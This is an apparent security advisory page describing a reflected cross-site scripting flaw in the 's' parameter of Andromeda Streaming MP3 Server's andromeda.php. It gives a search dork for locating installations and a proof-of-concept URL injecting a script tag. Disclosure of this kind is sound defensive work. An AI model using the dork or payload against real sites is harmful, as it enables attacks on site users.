Andromeda Streaming MP3 Server Cross Site Scripting

Risk: Low
Local: No
Remote: Yes

Andromeda Streaming MP3 Server v1.9.3.6 (s param) Remote XSS Vulnerability Vendor: Turnstyle Product web page: Affected version: PHP (2012) Summary: Turn your MP3 collection into an MP3 server. Simply add a single PHP or ASP script to any folder within your site. Now you can browse and play the contents of that folder - over the Web, or over your local network. Desc: Andromeda is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input to the 's' parameter of the 'andromeda.php' script. Tested on: Microsoft Windows XP Professional SP3 (EN) Apache 2.2.21 PHP 5.3.9 MySQL 5.5.20 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2012-5087 Advisory URL: 08.05.2012 -- Dork: "powered by andromeda version" PoC: http://localhost/AndromedaPHP/andromeda.php?q=s&s="><script>alert(1);</script>


Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022,


Back to Top